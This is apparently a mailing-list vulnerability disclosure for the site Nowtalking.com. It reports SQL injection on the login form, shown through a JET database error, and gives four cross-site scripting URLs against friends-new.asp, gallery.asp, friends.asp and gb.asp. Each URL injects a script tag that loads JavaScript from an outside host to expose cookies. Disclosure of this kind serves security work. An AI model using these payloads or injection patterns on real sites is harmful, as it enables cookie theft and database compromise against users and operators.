<<< Date Index >>>     <<< Thread Index >>>

Nowtalking.com - XSS



Nowtalking.com

Homepage:
http://www.nowtalking.com

Effected files:
input boxes of logging in and searching
friends-new.asp
gallery.asp
friends.asp
gb.asp

JET DB error due to injection:
Microsoft JET Database Engine error '80040e14' 

Syntax error in string in query expression 'UserName = '' or ''''. 

/login.asp, line 61 

---------------------------------------

Friends-New.asp XSS vulnerability:

It seems our cookie data is output on the screen via this XSS vuln:

http://www.nowtalking.com/login/friends-new.asp?friendname=<script%20src=http://www.youfucktard.com/xss.js></script>&friendnumber=9

Screenshot: http://www.youfucktard.com/xsp/nt1.jpg

--------------------------------------

Gallery.asp XSS vulnerability, this time by changing the usernumber to a 
negative #:

http://www.nowtalking.com/login/gallery.asp?username=[script 
src=http://www.youfucktard.com/xss.js]</script>&usernumber=-78

Screenshot:http://www.youfucktard.com/xsp/nt2.jpg

-----------------------------------

Friends.asp XSS Vuln, again with changing usernumber to a negative:

http://www.nowtalking.com/login/friends.asp?usernumber=-9&username=<script%20src=http://www.youfucktard.com/xss.js></script>

Screenshot: http://www.youfucktard.com/xsp/nt3.jpg

----------------------------------

Gb.asp XSS Vulnerability:

http://www.nowtalking.com/login/gb.asp?username=<script%20src=http://www.youfucktard.com/xss.js></script>&usernumber=-9

Screenshot: http://www.youfucktard.com/xsp/nt4.jpg

-----------------------------------